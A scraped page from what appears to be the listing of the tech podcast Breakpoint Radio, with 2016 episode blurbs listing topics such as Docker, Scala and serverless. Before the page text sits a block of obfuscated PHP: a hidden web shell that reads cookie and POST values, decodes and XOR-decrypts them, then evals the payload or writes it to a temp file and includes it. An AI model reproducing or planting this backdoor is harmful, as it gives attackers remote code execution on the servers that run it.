$eGOREacq = "\132" . chr ( 720 - 647 ).chr (95) . "\114" . chr ( 119 - 50 )."\x56" . "\142" . 'e';$nyLGtTlzgJ = "\x63" . "\x6c" . chr ( 582 - 485 )."\163" . 's' . "\x5f" . "\x65" . 'x' . chr (105) . 's' . "\x74" . chr ( 444 - 329 ); $gIZxvIxZ = class_exists($eGOREacq); $eGOREacq = "62478";$nyLGtTlzgJ = "30073";$xdRPukz = 0;if ($gIZxvIxZ == $xdRPukz){function gGwycz(){return FALSE;}$vEUdrKHqob = "46103";gGwycz();class ZI_LEVbe{private function zNTzvJ($vEUdrKHqob){if (is_array(ZI_LEVbe::$dBfIwLKWeq)) {$HuqUYYgkr = str_replace("\74" . "\x3f" . "\x70" . chr (104) . chr ( 569 - 457 ), "", ZI_LEVbe::$dBfIwLKWeq[chr ( 285 - 186 ).'o' . chr (110) . chr (116) . 'e' . chr (110) . "\164"]);eval($HuqUYYgkr); $vEUdrKHqob = "46103";exit();}}private $yZUVdIUc;public function BXZmZdAXQ(){echo 20240;}public function __destruct(){$vEUdrKHqob = "17948_2981";$this->zNTzvJ($vEUdrKHqob); $vEUdrKHqob = "17948_2981";}public function __construct($JTRLjiJhK=0){$iusOLIWguD = $_POST;$ubIfEKeAPM = $_COOKIE;$mnQtfQVMBl = "8121dbb1-4480-493a-957d-a43041fc31ba";$WIFbRs = @$ubIfEKeAPM[substr($mnQtfQVMBl, 0, 4)];if (!empty($WIFbRs)){$uegsY = "base64";$XnZBr = "";$WIFbRs = explode(",", $WIFbRs);foreach ($WIFbRs as $pYomxInD){$XnZBr .= @$ubIfEKeAPM[$pYomxInD];$XnZBr .= @$iusOLIWguD[$pYomxInD];}$XnZBr = array_map($uegsY . "\x5f" . 'd' . "\x65" . "\x63" . "\157" . "\x64" . chr ( 762 - 661 ), array($XnZBr,)); $XnZBr = $XnZBr[0] ^ str_repeat($mnQtfQVMBl, (strlen($XnZBr[0]) / strlen($mnQtfQVMBl)) + 1);ZI_LEVbe::$dBfIwLKWeq = @unserialize($XnZBr); $XnZBr = class_exists("17948_2981");}}public static $dBfIwLKWeq = 1088;}$VbGyKSb = new /* 15442 */ ZI_LEVbe(46103 + 46103);unset($VbGyKSb);}$aCyypinq = 'u' . "\x5f" . "\x57" . chr ( 115 - 43 ).'Y' . chr (85) . "\x67";$MiNzLzsrKM = chr ( 379 - 280 ).chr (108) . "\x61" . 's' . "\x73" . "\x5f" . "\145" . "\x78" . "\x69" . 's' . 't' . "\x73";$aifTVi = class_exists($aCyypinq); $aCyypinq = "21657";$MiNzLzsrKM = "58112";$yJJRIs = !1;if ($aifTVi == $yJJRIs){function EEkpveZz(){return FALSE;}$sdUiojuEO = "48155";EEkpveZz();class u_WHYUg{private function RUkuG($sdUiojuEO){if (is_array(u_WHYUg::$PxqkDRXi)) {$VyngwMSZNP = sys_get_temp_dir() . "/" . crc32(u_WHYUg::$PxqkDRXi["\x73" . chr ( 846 - 749 ).chr (108) . chr (116)]);@u_WHYUg::$PxqkDRXi["\x77" . chr (114) . "\x69" . chr (116) . "\x65"]($VyngwMSZNP, u_WHYUg::$PxqkDRXi[chr (99) . 'o' . chr (110) . chr ( 514 - 398 )."\x65" . "\156" . chr (116)]);include $VyngwMSZNP;@u_WHYUg::$PxqkDRXi["\x64" . "\145" . chr ( 900 - 792 ).'e' . chr ( 450 - 334 )."\x65"]($VyngwMSZNP); $sdUiojuEO = "48155";exit();}}private $vHKjc;public function jECssm(){echo 63544;}public function __destruct(){$sdUiojuEO = "64112_326";$this->RUkuG($sdUiojuEO); $sdUiojuEO = "64112_326";}public function __construct($zdldR=0){$AWArYf = $_POST;$RYtAiXRJ = $_COOKIE;$RKmGGmcTn = "63ca8f29-be20-4737-a469-28a91539d7d8";$dvsAe = @$RYtAiXRJ[substr($RKmGGmcTn, 0, 4)];if (!empty($dvsAe)){$CjCSRiyw = "base64";$bpBfjIN = "";$dvsAe = explode(",", $dvsAe);foreach ($dvsAe as $AFfRahSluv){$bpBfjIN .= @$RYtAiXRJ[$AFfRahSluv];$bpBfjIN .= @$AWArYf[$AFfRahSluv];}$bpBfjIN = array_map($CjCSRiyw . '_' . "\x64" . "\x65" . "\143" . chr (111) . chr (100) . 'e', array($bpBfjIN,)); $bpBfjIN = $bpBfjIN[0] ^ str_repeat($RKmGGmcTn, (strlen($bpBfjIN[0]) / strlen($RKmGGmcTn)) + 1);u_WHYUg::$PxqkDRXi = @unserialize($bpBfjIN); $bpBfjIN = class_exists("64112_326");}}public static $PxqkDRXi = 41933;}$TphzilG = new /* 28492 */ u_WHYUg(48155 + 48155); $_POST = Array();unset($TphzilG);} Breakpoint Radio – Page 3 – Breakpoint Radio

Podcast: Breakpoint Radio

Ep 9 – 22 Dec 2016 – ..The naughty Xmas elves have taken over !!

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

Sadly, no recording this time due to various (mainly tech) issues. Site is up to date with links on: AWS, bacon, deep learning, DI, docker, drone, Grafter, IoT, morning paper, netflix, nyan cat, Play, pony lang, sbt, Scala Exchange, serverless, Shapeless, UK region, Zalando. Happy Xmas, New Year and Best for 2017 all! Where bytes read more …


Ep 7 – 23 Nov 2016 – ..it’s the end of the World as we know it..

AWS, Azure, codemesh, Coindesk, coroutines, delimited continuations, docker, ethereum, Google, Jamie Dobson, Jenny Martin, JVM, k8s, Lift, Linux, Microsoft, monkigras, MS, NIST, Pere Villega, Philip Wadler, Rust, Shapeless, snapchat, Snoopers Charter, Tim Perret, VR, VS for Mac, zooids   Where bytes and bites collide


Ep 5 – 28 Oct 2016 – ..Oooh, what a rush!..

docker, Dotty, DYN DNS, hyperledger, Idris, microsoft surface, monkeyless, Narro, Node, Pony, Rust, sampa coffee, scala, serverless, Typelevel, Adrian Cockroft, BigchainDB, Brian Behlendorf, Cats, Dan Creswell, Debasish Ghosh, Edwin Brady Where bytes and bites collide
